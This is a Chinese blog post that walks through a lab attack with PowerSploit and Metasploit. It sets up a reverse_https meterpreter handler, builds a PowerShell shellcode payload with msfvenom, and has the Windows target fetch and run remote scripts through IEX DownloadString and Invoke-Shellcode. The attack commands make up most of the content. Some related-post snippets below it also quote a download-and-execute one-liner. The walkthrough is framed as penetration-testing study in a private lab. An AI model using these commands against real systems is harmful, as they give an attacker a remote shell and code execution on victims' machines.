PowerSploit 脚本攻击

已于 2022-11-28 21:42:31 修改
阅读量952 收藏 5
点赞数
分类专栏: 信息安全 文章标签: 安全 运维
于 2022-05-08 20:19:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58457395/article/details/124652810
版权

准备

虚拟机 

IP

kali192.168.100.3 
windows 7192.168.100.252

1. kali 跟 win 7 关闭防火墙

kali关闭防火墙控制软件

apt-get install ufw                //下载ufw

ufw disable                        //关闭防火墙

2. kali 与 win 7 必须ping通

Kali 配置

安装PowerSploit

#下载 PowerSploit

git clone https://github.com/PowerShellMafia/PowerSploit

#启动 apache2

service apache2 start

#将 PowerSploit 移动到 apache 的 html 下
mv PowerSploit /var/www/html

 

msfconsole 反弹 

#打开 msfconsole

msfconsole

#进入 exploit/multi/handler 文件下

use exploit/multi/handler

#修改 payload 地址

set payload windows/meterpreter/reverse_https

#修改 IP 地址

set lhost 192.168.5.25

# 修改 端口号(一定是要修改一个没有被占用的端口号)

set lport 4444 

另开一个终端

# 升成 PowerSploit 脚本木马

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.100.3 LPORT=4444 -f powershell -o /var/www/html/test

Win 7 配置

启动 PowerShell

 #下载脚本

IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")

#下载木马脚本

IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/test")

#执行第一个下载的脚本     -Force:不用提示直接启动

Invoke-Shellcode -Shellcode ($buf) -Force

 进入kali查看

花花日常生活
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
powershell攻击方法研究(翻译版)
weixin_41082546的博客
10-16 446
powershell攻击方法研究执行摘要在创建恶意软件时,攻击者越来越多地利用已存在于target上的工具来攻击计算机,因为Microsoft PowerShell默认安装在Windows计算机上,它是一个理想的攻击工具链的候选项, 由于powershell使用较为灵活,并且检测更困难,因此被很多攻击者所喜爱。PowerShell是一种功能强大的脚本语言和shell框架,主要用于管理Windows计算机。它已经存在了10多年,被许多系统管理员所使用,并且将来可能替换Windows上的默认命令提示符。Powe
[网络安全提高篇] 一〇八.PowershellPowerSploit脚本渗透详解 (1)
杨秀璋的专栏
04-09 6961
前文给大家介绍了安全还威胁框架ATT&CK、滑动标尺模型,并通过Cyberbit Range靶场详细介绍蓝队勒索事件取证溯源过程。这篇文章将详细讲解PowerShellPowerSploit脚本攻击,进一步结合MSF漏洞利用来实现脚本攻击。希望这篇文章对您有帮助,更希望帮助更多安全或红蓝对抗的初学者,也推荐大家去使用Cyberbit Range的靶场,且看且珍惜。本文参考徐焱老师的《Web安全攻防渗透测试实战指南》著作,谢公子博客,并结合作者之前的博客和经验进行总结。
powershell 攻击中的应用.pdf
12-10
powershell 攻击中的应用.pdf
PowerSploit脚本
weixin_44110913的博客
08-02 878
目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1脚本的使用 PowerSploit PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等。Power...
PowerSploit脚本攻击实战
bring_coco的博客
01-24 1037
环境 kali(192.168.188.128) win7(192.168.188.148) 前提 1.输入git命令安装PowerSploit 命令:git clone https://github.com/PowerShellMafia/PowerSploit 演示: 2.输入以下命令开启Apache服务 命令:service apache2 start 演示: 3.把下载好的文件夹移动到var/www/html目录,搭建一个简易的服务器 介绍PowerSploit各模块的功能 1.Antivi
使用PowerShell下载文件
Kuma_Migoyan的专栏
03-07 2104
$client = New-Object “System.Net.WebClient” $client.DownloadFile(“\\10.1.18.21\8859.txt”,”D:\info.txt”)
PowerSploit脚本的用法
谢公子的博客
01-14 2184
目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1脚本的使用 PowerSploit PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell攻击脚本,它们主要用于渗透中的信...
[系统安全] 四十一.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解
杨秀璋的专栏
04-30 3764
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作、注册表访问等。这篇文章将详细讲解PowerShellPowerSploit脚本攻击,进一步结合MSF漏洞利用来实现脚本攻击。希望这篇文章对您有帮助,更希望帮助更多安全或红蓝对抗的初学者,且看且珍惜。本文参考徐焱老师的《Web安全攻防渗透测试实战指南》著作,谢公子博客,并结合作者之前的博客和经验进行总结。
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1588
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
pywerview, PowerSploit的( 部分) python 重写是 PowerView.zip
09-17
pywerview, PowerSploit的( 部分) python 重写是 PowerView PywerView
kali安装PowerSploit
qq_53175607的博客
11-19 2945
PowerSploit的安装 1.使用命令git clone https://github.com/PowerShellMafia/PowerSploit从github下载文件。 2.使用命令service apache2 start启动apache服务。 3.将下载好的文件移动到var/www/html下 注意:自己下载的文件路径可能不一样,要按照自己的来。 4.重启apacheservice apache2 start,自己kali的ip/PowerSploit/进入目标页面比如 192.168.5.1
Meteasploit技术
m0_65332604的博客
04-06 2306
在使用Kali操作系统是应注意即使更新源,就像平时及时更新手机APP更新命令如下: apt-get update:只更新软件包的索引源,作用:同步源的软件包的索引信息,从而进行软件更新。 Apt-get upgrade:升级系统上安装的所有软件包,如果失败则保持更新之前的状态。 Apt-get dist-upgrade:升级整个Liunux系统(不仅升级所有已安装的软件包,而且会处理升级过程中可能出现的冲突,在某些情况下,他的部分升级需要人工参与)。 渗透攻击大致步骤: *扫描目标及系统,寻找可用
PowerShell攻击指南
最新发布
鸡蛋炒鸡蛋
03-03 5340
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
PowerSploit 搭建
weixin_46104215的博客
11-07 745
PowerSploit 是一款基于powershell 的后渗透(Post-Exploitation)框架软件,包含很多powershell攻击脚本,它们主要用于渗透中的信息侦察,权限提升,权限维持 下载地址:https://github.com/PowerShellMafia/PowerSploit 1.直接在 kali 中下载,git命令 2.开启 Apache 服务,在网页输入http://ip 地址,可以看到成功开启 service apache2 start 3. 简易服务...
使用Windows的Powershell下载文件
热门推荐
qq_35436635的博客
06-08 1万+
$client = new-object System.Net.WebClient$client.DownloadFile('#1', '#2')#1是需要下载文件的url#2是保存为本地文件的路径,包括文件名例如:$client.DownloadFile('https://www.2cto.com/net/201611/562900.html', 'D:/562900.html')...
PowerShell 下载地址
06-12 3029
WindowsXP-KB926140-x86-CHS(PowerShell1.0)(1.65M)下载地址 1.0http://www.microsoft.com/zh-cn/download/details.aspx?id=9591 2.0http://www.microsoft.com/zh-cn/download/details.aspx?id=16818
认识powershell攻击
weixin_44255856的博客
08-12 1723
简介:PowerShell是一种基于任务的命令行shell和脚本语言建立在net。 PowerShell帮助系统管理员和高级用户快速自动化管理的任务 操作系统(Linux、macOS和Windows)和过程。 PowerShell命令允许您从命令行管理电脑。 PowerShell供应商让你 访问数据存储,如注册表和证书存储,尽可能轻松地访问文件 系统。其可读性,易用性,基于当前所有shell之首。...
Powershell攻击指南2——Empire
willow_liang的博客
12-05 1276
目录 Empire 1.介绍 2.安装 3.使用监听 4.生成木马 4.1 DLL木马 4.2 launcher 4.3 launcher_vbs木马 4.4 launcher_bat木马 4.5 Macro木马 4.6Ducky 连接主机及基本使用 1.查看已经连接的主机 2.interact命令连接主机 信息收集 Empire 1.介绍 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成.
通过cmd指令调用powershell实现下载并运行网上程序
量子复合态的博客
05-29 8040
指令:(echo powershell "($client = new-object System.Net.WebClient) -and ($client.DownloadFile('https://www.pdcblog.tk/pan/data/User/admin/home/test.vbs', 'test.vbs')) -and (exit)") | cmd && wscr...
理解XSS跨站脚本攻击:原理、危害与防御
XSS跨站脚本攻击 XSS跨站脚本攻击是Web应用程序中常见的安全漏洞,其名称源于为了避免与CSS(层叠样式表)混淆而得名。这种攻击方式允许恶意攻击者通过在网站上注入代码,利用网站对用户输入数据的信任,对其他用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值